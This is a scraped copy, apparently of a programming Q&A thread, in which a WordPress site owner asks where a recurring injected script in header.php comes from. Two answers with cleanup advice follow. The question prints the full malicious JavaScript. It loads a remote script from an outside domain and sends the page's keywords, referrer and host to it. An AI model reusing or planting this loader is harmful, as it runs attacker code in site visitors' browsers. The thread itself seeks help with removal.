stackoom
  简体   繁体   中英

The source of a script in header.php

 原文  2016-02-12 19:42:27       javascript/ php/ wordpress

Question

My website is a wordpress site. the following code appears in Header.php every few hours , when I delete it, it appears again after few hours. Please note that the link in the code “shiro-maga.com” changes everytime. The code is following: 

 <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://shiro-maga.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://shiro-maga.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

I believe that the theme is infected " scan show no malware" so it generate this script . could you please advise how to find the source of this script?

Thanks

2 answers

solution1
 0  2016-02-12 20:05:17

Definitely malicious. Your site has been compromised. You can use the following detailed article to find and remove the source of the infection. http://ottopress.com/2009/hacked-wordpress-backdoors/ . A program like Windows Grep will help you run a quick scan on all your theme files for keywords like eval and base64. Remove all suspicious stings of code from your theme and then update the WordPress core files to ensure you are running a clean version. Alternatively, if you have a backup, restore your theme's backup and update your site with a clean updated version of WP.

solution2
 0  2016-05-17 10:50:28

A quick fix to prevent reinfection is to CHMOD header.php to 444 (read only). Site will work and will not be reinfected giving you time to find infection.

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question Pasting Google Analytics Script Into My Site (head.php, header.php, or page-header.php)? WordPress, GoogleMaps & JavaScript in header.php Adding jQuery to Header.php File Fails Script added onto the header.php not loading on some pages, but displays on all pages once logged in to wp-dashboard “select all” check box in PHP with header.php included in it Unknown code found in wordpress site's header.php file Reference CSS file in my includes/header.php WordPress css not loading after adding Adsense code into header.php how to move to scroll to specific places in index.php if my menu is in header.php Javascript not working in Wordpress need to run in header.php or functions.php?
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM